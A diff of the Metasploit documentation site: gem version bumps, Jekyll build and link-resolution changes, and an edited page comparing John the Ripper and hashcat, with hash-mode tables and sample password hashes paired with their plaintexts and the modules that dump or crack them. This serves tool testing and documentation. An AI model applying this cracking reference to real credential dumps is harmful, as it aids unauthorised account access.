@@ -25,23 +25,24 @@ GEM
    ffi (1.15.5)
    forwardable-extended (2.6.0)
    http_parser.rb (0.8.0)
-    i18n (1.10.0)
+    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
-    jekyll (4.2.2)
+    jekyll (4.3.1)
      addressable (~> 2.4)
      colorator (~> 1.0)
      em-websocket (~> 0.5)
      i18n (~> 1.0)
-      jekyll-sass-converter (~> 2.0)
+      jekyll-sass-converter (>= 2.0, < 4.0)
      jekyll-watch (~> 2.0)
-      kramdown (~> 2.3)
+      kramdown (~> 2.3, >= 2.3.1)
      kramdown-parser-gfm (~> 1.0)
      liquid (~> 4.0)
-      mercenary (~> 0.4.0)
+      mercenary (>= 0.3.6, < 0.5)
      pathutil (~> 0.9)
-      rouge (~> 3.0)
+      rouge (>= 3.0, < 5.0)
      safe_yaml (~> 1.0)
-      terminal-table (~> 2.0)
+      terminal-table (>= 1.8, < 4.0)
+      webrick (~> 1.7)
    jekyll-include-cache (0.2.1)
      jekyll (>= 3.7, < 5.0)
    jekyll-sass-converter (2.2.0)
@@ -52,7 +53,7 @@ GEM
      jekyll (>= 3.7, < 5.0)
    jekyll-watch (2.2.1)
      listen (~> 3.0)
-    kramdown (2.3.2)
+    kramdown (2.4.0)
      rexml
    kramdown-parser-gfm (1.1.0)
      kramdown (~> 2.0)
@@ -64,35 +65,36 @@ GEM
    method_source (1.0.0)
    pathutil (0.16.2)
      forwardable-extended (~> 2.6)
-    pry (0.13.1)
+    pry (0.14.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.9.0)
+    pry-byebug (3.10.1)
      byebug (~> 11.0)
-      pry (~> 0.13.0)
-    public_suffix (4.0.7)
+      pry (>= 0.13, < 0.15)
+    public_suffix (5.0.1)
    rake (13.0.6)
-    rb-fsevent (0.11.1)
+    rb-fsevent (0.11.2)
    rb-inotify (0.10.1)
      ffi (~> 1.0)
    rexml (3.2.5)
-    rouge (3.28.0)
+    rouge (4.0.0)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
-    terminal-table (2.0.0)
-      unicode-display_width (~> 1.1, >= 1.1.1)
-    unicode-display_width (1.8.0)
+    terminal-table (3.0.2)
+      unicode-display_width (>= 1.1.1, < 3)
+    unicode-display_width (2.3.0)
    webrick (1.7.0)

 PLATFORMS
  ruby

 DEPENDENCIES
-  jekyll (~> 4.2.0)
+  jekyll (~> 4.3.0)
  jekyll-sitemap
  just-the-docs!
  pry-byebug
+  rexml
  tzinfo (~> 1.2)
  tzinfo-data
  wdm (~> 0.1.1)
@@ -13,6 +13,19 @@ How it works:

 Behind the scenes these docs are built and deployed to https://docs.metasploit.com/

+### Adding pages
+
+You can modify existing documentation files within `metasploit-framework.wiki/` with an editor of your choice and send a pull request.
+To add a new page, modify `navigation.rb`. Full details are found beside the `NAVIGATION_CONFIG` constant.
+
+## Adding links
+
+For linking to other docs the Github markdown syntax `[[link text|relative_path_to_docs]]` is used. Behind the scenes these
+links will be verified at build time to ensure there's no 404 links.
+
+Note: It is also possible to use the syntax `[[link text|relative_path_to_docs#section]]` - but this navigation will happen client side, and
+there is no validation that these sections exist at build time. It is possible for future edits to a markdown file to break these links.
+
 ## Setup

 ### Developer build
@@ -42,9 +55,3 @@ bundle exec ruby build.rb --production --serve
 ```

 Now visit http://127.0.0.1:4000/metasploit-framework/
-
-
-### Contributing Documentation
-
-You can modify existing documentation files within `metasploit-framework.wiki/` with an editor of your choice and send a pull request.
-Note that adding a new page will also require modifying `navigation.rb` to appear on the navigation menu.
@@ -30,6 +30,9 @@ exclude:
  - README.md

 # just-the-docs config
+mermaid_enabled: true
+mermaid:
+  version: "9.2.2"
 heading_anchors: true
 aux_links_new_tab: true
 aux_links:
@@ -38,7 +41,7 @@ aux_links:

 nav_cache: true

-# False until the wiki's markdown files are migrated into the Metasploit repository
+# We set gh_edit_link to false to opt out of the default edit link support - and instead use a custom implementation in _includes/footer_custom.html
 gh_edit_link: false
 gh_edit_link_text: 'Edit this page on GitHub'
 gh_edit_repository: 'https://github.com/rapid7/metasploit-framework'
@@ -0,0 +1,3 @@
+# Staging assumes that it is currently deployed to gh-pages; All links are prefixed with /metasploit-framework
+baseurl: 'metasploit-framework'
+ga_tracking: ''
@@ -0,0 +1,17 @@
+{% comment %}
+Modification of https://github.com/just-the-docs/just-the-docs/blob/2495d3e6bb5720ae23e35caf16888f0c7f37ede0/_includes/components/footer.html
+The 'edit this page' page link now only appears when the root folder entry has content, and also includes linking directly to module documentation,
+or site wiki content
+{% endcomment %}
+
+{% if
+    site.gh_edit_link_text and
+    site.gh_edit_repository and
+    site.gh_edit_branch and
+    site.gh_edit_view_mode and
+    page.has_content == 'true'
+%}
+    <p class="text-small text-grey-dk-000 mb-0">
+        <a href="{{ site.gh_edit_repository }}/{{ site.gh_edit_view_mode }}/{{ site.gh_edit_branch }}{% if site.gh_edit_source %}/{{ site.gh_edit_source }}{% endif %}{% if page.collection and site.collections_dir %}/{{ site.collections_dir }}{% endif %}/{{ page.old_path }}" id="edit-this-page">{{ site.gh_edit_link_text }}</a>
+    </p>
+{% endif %}
@@ -0,0 +1,9 @@
+<style>
+#main-content p {
+    text-align: justify;
+}
+
+.language-mermaid .label {
+    text-transform: inherit;
+}
+</style>
@@ -2,22 +2,25 @@ require 'fileutils'
 require 'uri'
 require 'open3'
 require 'optparse'
+require 'did_you_mean'
 require_relative './navigation'

-# Temporary build module to help migrate and build the Metasploit wiki https://github.com/rapid7/metasploit-framework/wiki into a format
-# supported by Jekyll, as well as creating a hierarchical folder structure for nested documentation
+# This build module was used to migrate the old Metasploit wiki https://github.com/rapid7/metasploit-framework/wiki into a format
+# supported by Jekyll. Jekyll was chosen as it was written in Ruby, which should reduce the barrier to entry for contributions.
+#
+# The build script took the flatlist of markdown files from the wiki, and converted them into the hierarchical folder structure
+# for nested documentation. This configuration is defiend in `navigation.rb`
+#
+# In the future a different site generator could be used, but it should be possible to use this build script again to migrate to a new format
 #
 # For now the doc folder only contains the key files for building the docs site and no content. The content is created on demand
-# from the metasploit-framework wiki on each build
-#
-# In the future, the markdown files will be committed directly to the metasploit-framework directory, the wiki history will be
-# merged with metasploit-framework, and the old wiki will no longer be updated.
+# from the `metasploit-framework.wiki` folder on each build
 module Build
  # The metasploit-framework.wiki files that are committed to Metasploit framework's repository
  WIKI_PATH = 'metasploit-framework.wiki'.freeze
-  # A locally cloned version of https://github.com/rapid7/metasploit-framework/wiki
+  # A locally cloned version of https://github.com/rapid7/metasploit-framework/wiki - should no longer be required for normal workflows
  OLD_WIKI_PATH = 'metasploit-framework.wiki.old'.freeze
-  PRODUCTION_BUILD_ARTIFACTS = '_site'.freeze
+  RELEASE_BUILD_ARTIFACTS = '_site'.freeze

  # For now we Git clone the existing metasploit wiki and generate the Jekyll markdown files
  # for each build. This allows changes to be made to the existing wiki until it's migrated
@@ -46,13 +49,18 @@ module Build
    def validate!
      configured_paths = all_file_paths
      missing_paths = available_paths.map { |path| path.gsub("#{WIKI_PATH}/", '') } - ignored_paths - existing_docs - configured_paths
-      raise ConfigValidationError, "Unhandled paths #{missing_paths.join(', ')}" if missing_paths.any?
+      raise ConfigValidationError, "Unhandled paths #{missing_paths.join(', ')} - add navigation entries to navigation.rb for these files" if missing_paths.any?

      each do |page|
        page_keys = page.keys
        allowed_keys = %i[old_wiki_path path new_base_name nav_order title new_path folder children has_children parents]
        invalid_keys = page_keys - allowed_keys
-        raise ConfigValidationError, "#{page} had invalid keys #{invalid_keys.join(', ')}" if invalid_keys.any?
+
+        suggestion = DidYouMean::SpellChecker.new(dictionary: allowed_keys).correct(invalid_keys[0]).first
+        error = "#{page} had invalid keys #{invalid_keys.join(', ')}."
+        error += " Did you mean #{suggestion}?" if suggestion
+
+        raise ConfigValidationError, error  if invalid_keys.any?
      end

      # Ensure unique folder names
@@ -183,12 +191,18 @@ module Build
    def extract_absolute_wiki_links(markdown)
      new_links = {}

-      markdown.scan(%r{(https?://github.com/rapid7/metasploit-framework/wiki/([\w().%_-]+))}) do |full_match, old_path|
+      markdown.scan(%r{(https?://github.com/rapid7/metasploit-framework/wiki/([\w().%_#-]+))}) do |full_match, old_path|
        full_match = full_match.gsub(/[).]+$/, '')
        old_path = URI.decode_www_form_component(old_path.gsub(/[).]+$/, ''))

-        new_path = new_path_for(old_path)
-        replacement = "{% link docs/#{new_path} %}"
+        begin
+          old_path_anchor = URI.parse(old_path).fragment
+        rescue URI::InvalidURIError
+          old_path_anchor = nil
+        end
+
+        new_path = new_path_for(old_path, old_path_anchor)
+        replacement = "{% link docs/#{new_path} %}#{old_path_anchor ? "##{old_path_anchor}" : ""}"

        link = {
          full_match: full_match,
@@ -208,18 +222,26 @@ module Build
    #   '[[Custom name|Relative Path]]'
    #   '[[Custom name|relative-path]]'
    #   '[[Custom name|./relative-path.md]]'
+    #   '[[Custom name|./relative-path.md#section-anchor-to-link-to]]'
+    # Note that the page target resource file is validated for existence at build time - but the section anchors are not
    def extract_relative_links(markdown)
      existing_links = @links
      new_links = {}
-      markdown.scan(/(\[\[([\w\/_ '().:,-]+)(?:\|([\w\/_ '():,.-]+))?\]\])/) do |full_match, left, right|
+
+      markdown.scan(/(\[\[([\w\/_ '().:,-]+)(?:\|([\w\/_ '():,.#-]+))?\]\])/) do |full_match, left, right|
        old_path = (right || left)
-        new_path = new_path_for(old_path)
+        begin
+          old_path_anchor = URI.parse(old_path).fragment
+        rescue URI::InvalidURIError
+          old_path_anchor = nil
+        end
+        new_path = new_path_for(old_path, old_path_anchor)
        if existing_links[full_match] && existing_links[full_match][:new_path] != new_path
          raise "Link for #{full_match} previously resolved to #{existing_links[full_match][:new_path]}, but now resolves to #{new_path}"
        end

        link_text = left
-        replacement = "[#{link_text}]({% link docs/#{new_path} %})"
+        replacement = "[#{link_text}]({% link docs/#{new_path} %}#{old_path_anchor ? "##{old_path_anchor}" : ""})"

        link = {
          full_match: full_match,
@@ -236,18 +258,39 @@ module Build
      new_links
    end

-    def new_path_for(old_path)
-      old_path = old_path.gsub(' ', '-')
+    def new_path_for(old_path, old_path_anchor)
+      # Strip out any leading `./` or `/` before the relative path.
+      # This is needed for our later code that does additional filtering for
+      # potential ambiguity with absolute paths since those comparisons occur
+      # against filenames without the leading ./ and / parts.
+      old_path = old_path.gsub(/^[.\/]+/, '')
+
+      # Replace any spaces in the file name with - separators, then
+      # make replace anchors with an empty string.
+      old_path = old_path.gsub(' ', '-').gsub("##{old_path_anchor}", '')
+
      matched_pages = pages.select do |page|
        !page[:folder] &&
          (File.basename(page[:path]).downcase == "#{File.basename(old_path)}.md".downcase ||
            File.basename(page[:path]).downcase == "#{File.basename(old_path)}".downcase)
      end
      if matched_pages.empty?
-        raise "Missing path for #{old_path}"
+        raise "Link not found: #{old_path}"
      end
+      # Additional filter for absolute paths if there's potential ambiguity
      if matched_pages.count > 1
-        raise "Duplicate paths for #{old_path}"
+        refined_pages = matched_pages.select do |page|
+          !page[:folder] &&
+            (page[:path].downcase == "#{old_path}.md".downcase ||
+              page[:path].downcase == old_path.downcase)
+        end
+
+        if refined_pages.count != 1
+          page_paths = matched_pages.map { |page| page[:path] }
+          raise "Duplicate paths for #{old_path} - possible page paths found: #{page_paths}"
+        end
+
+        matched_pages = refined_pages
      end

      matched_pages.first.fetch(:new_path)
@@ -276,7 +319,11 @@ module Build
        '@zeroSteiner',
        '@harmj0y',
      ]
+      # These tags look like Github/Twitter handles, but are actually ruby/java code snippets
      ignored_tags = [
+        '@spid',
+        '@adf3',
+        '@LDAP-DC3',
        '@harmj0yDescription',
        '@phpsessid',
        '@http_client',
@@ -368,7 +415,8 @@ module Build
          **page.slice(:title, :has_children, :nav_order),
          parent: (page[:parents][-1] || {})[:title],
          warning: "Do not modify this file directly. Please modify metasploit-framework/docs/metasploit-framework.wiki instead",
-          old_path: page[:path] ? File.join(WIKI_PATH, page[:path]) : "none - folder automatically generated"
+          old_path: page[:path] ? File.join(WIKI_PATH, page[:path]) : "none - folder automatically generated",
+          has_content: !page[:path].nil?
        }.compact

        page_config[:has_children] = true if page[:has_children]
@@ -382,7 +430,7 @@ module Build
        new_path = File.join(result_folder, page[:new_path])
        FileUtils.mkdir_p(File.dirname(new_path))

-        if page[:folder]
+        if page[:folder] && page[:path].nil?
          new_docs_content = preamble.rstrip + "\n"
        else
          old_path = File.join(WIKI_PATH, page[:path])
@@ -414,7 +462,7 @@ module Build
    def link_corrector_for(config)
      link_corrector = LinkCorrector.new(config)
      config.each do |page|
-        unless page[:folder]
+        unless page[:path].nil?
          content = File.read(File.join(WIKI_PATH, page[:path]), encoding: Encoding::UTF_8)
          link_corrector.extract(content)
        end
@@ -424,8 +472,8 @@ module Build
    end
  end

-  # Serve the production build at http://127.0.0.1:4000/metasploit-framework/
-  class ProductionServer
+  # Serve the release build at http://127.0.0.1:4000/metasploit-framework/
+  class ReleaseBuildServer
    autoload :WEBrick, 'webrick'

    def self.run
@@ -434,7 +482,7 @@ module Build
          Port: 4000
        }
      )
-      server.mount('/', WEBrick::HTTPServlet::FileHandler, PRODUCTION_BUILD_ARTIFACTS)
+      server.mount('/', WEBrick::HTTPServlet::FileHandler, RELEASE_BUILD_ARTIFACTS)
      trap('INT') do
        server.shutdown
      rescue StandardError
@@ -539,11 +587,18 @@ module Build
    end

    if options[:production]
-      FileUtils.remove_dir(PRODUCTION_BUILD_ARTIFACTS, true)
+      FileUtils.remove_dir(RELEASE_BUILD_ARTIFACTS, true)
      run_command('JEKYLL_ENV=production bundle exec jekyll build')

      if options[:serve]
-        ProductionServer.run
+        ReleaseBuildServer.run
+      end
+    elsif options[:staging]
+      FileUtils.remove_dir(RELEASE_BUILD_ARTIFACTS, true)
+      run_command('JEKYLL_ENV=production bundle exec jekyll build --config _config.yml,_config_staging.yml')
+
+      if options[:serve]
+        ReleaseBuildServer.run
      end
    elsif options[:serve]
      run_command('bundle exec jekyll serve --config _config.yml,_config_development.yml --incremental')
@@ -567,6 +622,10 @@ if $PROGRAM_NAME == __FILE__
      options[:production] = production
    end

+    opts.on('--staging', 'Run a staging build for deploying to gh-pages') do |staging|
+      options[:staging] = staging
+    end
+
    opts.on('--serve', 'serve the docs site') do |serve|
      options[:serve] = serve
    end
@@ -590,6 +649,10 @@ if $PROGRAM_NAME == __FILE__
      options[:create_wiki_to_framework_migration_branch] = true
    end
  end
+  if ARGV.length == 0
+    puts options_parser.help
+    exit 1
+  end
  options_parser.parse!

  Build.run(options)
@@ -43,7 +43,7 @@ This section will cover the differences between the two crackers.  This is not a
 ### General Settings

 | Description     | JtR              | hashcat             |
-|-----------------|------------------|---------------------|
+| --------------- | ---------------- | ------------------- |
 | session         | `--session`      | `--session`         |
 | no logging      | `--no-log`       | `--logfile-disable` |
 | config file     | `--config`       | (n/a)               |
@@ -57,33 +57,33 @@ This section will cover the differences between the two crackers.  This is not a

 ### Hash Setting

-| Hash                        | JtR                     |  [hashcat](https://hashcat.net/wiki/doku.php?id=example_hashes) |
-|-----------------------------|-------------------------|--------------------|
-| List formats                | `john --list=formats` `john --list=format-all-details` | `hashcat -h` |
-| | | |
-| cram-md5                    | hmac-md5                | 10200                   |
-| des                         | descrypt                | 1500                    |
-| md5 (crypt is $1$)          | md5crypt                | 500                     |
-| sha1                        |                         | 100                     |
-| bsdi                        | bsdicrypt               | 12400                   |
-| sha256                      | sha256crypt             | 7400                    |
-| sha512                      | sha512crypt             | 1800                    |
-| blowfish                    | bcrypt                  | 3200                    |
-| lanman                      | lm                      | 3000                    |
-| NTLM                        | nt                      | 1000                    |
-| mssql (05)                  | mssql                   | 131                     |
-| mssql12                     | mssql12                 | 1731                    |
-| mssql (2012/2014)           | mssql05                 | 132                     |
-| oracle (10)                 | oracle                  | 3100                    |
-| oracle 11                   | oracle11                | 112                     |
-| oracle 12                   | oracle12c               | 12300                   |
-| postgres                    | dynamic_1034            | 12                      |
-| mysql                       | mysql                   | 200                     |
-| mysql-sha1                  | mysql-sha1              | 300                     |
-| sha512($p.$s) - vmware ldap | dynamic_82              | 1710                    |
-| md5 (raw, unicode)          | Raw-MD5u                | 30 (with an empty salt) |
-| NetNTLMv1                   | netntlm                 | 5500                    |
-| NetNTLMv2                   | netntlmv2               | 5600                    |
+| Hash                        | JtR                                                    | [hashcat](https://hashcat.net/wiki/doku.php?id=example_hashes) |
+| --------------------------- | ------------------------------------------------------ | -------------------------------------------------------------- |
+| List formats                | `john --list=formats` `john --list=format-all-details` | `hashcat -h`                                                   |
+|                             |                                                        |                                                                |
+| cram-md5                    | hmac-md5                                               | 10200                                                          |
+| des                         | descrypt                                               | 1500                                                           |
+| md5 (crypt is $1$)          | md5crypt                                               | 500                                                            |
+| sha1                        |                                                        | 100                                                            |
+| bsdi                        | bsdicrypt                                              | 12400                                                          |
+| sha256                      | sha256crypt                                            | 7400                                                           |
+| sha512                      | sha512crypt                                            | 1800                                                           |
+| blowfish                    | bcrypt                                                 | 3200                                                           |
+| lanman                      | lm                                                     | 3000                                                           |
+| NTLM                        | nt                                                     | 1000                                                           |
+| mssql (05)                  | mssql                                                  | 131                                                            |
+| mssql12                     | mssql12                                                | 1731                                                           |
+| mssql (2012/2014)           | mssql05                                                | 132                                                            |
+| oracle (10)                 | oracle                                                 | 3100                                                           |
+| oracle 11                   | oracle11                                               | 112                                                            |
+| oracle 12                   | oracle12c                                              | 12300                                                          |
+| postgres                    | dynamic_1034                                           | 12                                                             |
+| mysql                       | mysql                                                  | 200                                                            |
+| mysql-sha1                  | mysql-sha1                                             | 300                                                            |
+| sha512($p.$s) - vmware ldap | dynamic_82                                             | 1710                                                           |
+| md5 (raw, unicode)          | Raw-MD5u                                               | 30 (with an empty salt)                                        |
+| NetNTLMv1                   | netntlm                                                | 5500                                                           |
+| NetNTLMv2                   | netntlmv2                                              | 5600                                                           |

 While Metasploit standardizes with the JtR format, the hashcat [library](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/password_crackers/cracker.rb) includes the `jtr_format_to_hashcat_format` function to translate from jtr to hashcat.

@@ -123,14 +123,19 @@ JtR
 For testing Hashcat/JtR integration, this is a common list of commands to import example hashes of many different types.  When possible the username is separated by an underscore, and anything after it is the password.  For example `des_password`, the password for the hash is `password`:

 ```
+# nix
 creds add user:des_password hash:rEK1ecacw.7.c jtr:des
 creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
 creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
 creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
 creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
 creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
+# windows
 creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
 creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
+creds add user:u4-netntlm hash:u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c jtr:netntlm
+creds add user:admin hash:admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 jtr:netntlmv2
+# sql
 creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
 creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
 creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12
@@ -153,29 +158,32 @@ creds add user:vmware_ldap hash:'$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08

 This data breaks down to the following table:

-| Hash Type | Username | Hash | Password | jtr format | Modules which dump this info | Modules which crack this |
-|-----------|----------|------|----------|------------|------------------------------|-------------------------|
-| DES | des_password   |  `rEK1ecacw.7.c`                     | password | des  | | auxiliary/analyze/jtr_aix auxiliary/analyze/jtr_linux |
-| MD5 | md5_password   | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/` | password | md5  | | auxiliary/analyze/jtr_linux |
-| BSDi | bsdi_password | `_J9..K0AyUubDrfOgO4s`               | password | bsdi | | auxiliary/analyze/jtr_linux |
-| SHA256 | sha256_password | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5` | password | sha256,crypt | | auxiliary/analyze/jtr_linux |
-| SHA512 | sha512_password | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1` | password | sha512,crypt | | auxiliary/analyze/jtr_linux |
-| Blowfish | blowfish_password | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe` | password | bf | | auxiliary/analyze/jtr_linux |
-| Lanman | lm_password | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C` | password | lm | | auxiliary/analyze/jtr_windows_fast |
-| NTLM | nt_password | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C` | password | nt | | auxiliary/analyze/jtr_windows_fast |
-| MSSQL (2005) | mssql05_toto | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908` | toto | mssql05 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/jtr_mssql_fast |
-| MSSQL | mssql_foo | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254` | foo | mssql | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/jtr_mssql_fast |
-| MSSQL (2012) | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16` | Password! | mssql12 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/jtr_mssql_fast |
-| MySQL | mysql_probe | `445ff82636a7ba59` | probe | mysql | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/jtr_mysql_fast |
-| MySQL SHA1 | mysql-sha1_tere | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB` | tere | mysql-sha1 | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/jtr_mysql_fast |
-| Oracle | simon | `4F8BC1809CB2AF77` | A | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/jtr_oracle_fast |
-| Oracle | SYSTEM | `9EEDFA0AD26C6D52` | THALES | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/jtr_oracle_fast |
-| Oracle 11    | DEMO  | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/jtr_oracle_fast |
-| Oracle 11 | oracle11_epsilon | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/jtr_oracle_fast |
-| Oracle 12 | oracle12_epsilon | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B` | epsilon | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/jtr_oracle_fast |
-| Postgres | example | `md5be86a79bf2043622d58d5453c47d4860` | password | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump | auxiliary/analyze/jtr_postgres_fast |
-| HMAC-MD5 | hmac_password | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9` | password | hmac-md5 | auxiliary/server/capture/smtp | None |
-| SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6` | TestPass123# | dynamic_82 |  | None |
+| Hash Type                            | Username           | Hash                                                                                                                                                                                                                                                                   | Password     | jtr format       | Modules which dump this info                     | Modules which crack this                                  |
+| ------------------------------------ | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | ---------------- | ------------------------------------------------ | --------------------------------------------------------- |
+| -----------                          | ----------         | ------                                                                                                                                                                                                                                                                 | ----------   | ------------     | ------------------------------                   | -------------------------                                 |
+| DES                                  | des_password       | `rEK1ecacw.7.c`                                                                                                                                                                                                                                                        | password     | des              |                                                  | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux |
+| MD5                                  | md5_password       | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/`                                                                                                                                                                                                                                   | password     | md5              |                                                  | auxiliary/analyze/crack_linux                             |
+| BSDi                                 | bsdi_password      | `_J9..K0AyUubDrfOgO4s`                                                                                                                                                                                                                                                 | password     | bsdi             |                                                  | auxiliary/analyze/crack_linux                             |
+| SHA256                               | sha256_password    | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5`                                                                                                                                                                                                              | password     | sha256,crypt     |                                                  | auxiliary/analyze/crack_linux                             |
+| SHA512                               | sha512_password    | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1`                                                                                                                                                                   | password     | sha512,crypt     |                                                  | auxiliary/analyze/crack_linux                             |
+| Blowfish                             | blowfish_password  | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe`                                                                                                                                                                                                         | password     | bf               |                                                  | auxiliary/analyze/crack_linux                             |
+| Lanman                               | lm_password        | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | lm               |                                                  | auxiliary/analyze/crack_windows                           |
+| NTLM                                 | nt_password        | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | nt               |                                                  | auxiliary/analyze/crack_windows                           |
+| NetNTLMv1                            | u4-netntlm         | `u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c`                                                                                                                                   | hashcat      | netntlm          |                                                  | auxiliary/analyze/crack_windows                           |
+| NetNTLMv2                            | admin              | `admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030`                                                                                       | hashcat      | netntlmv2        |                                                  | auxiliary/analyze/crack_windows                           |
+| MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05          | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql            | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12          | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
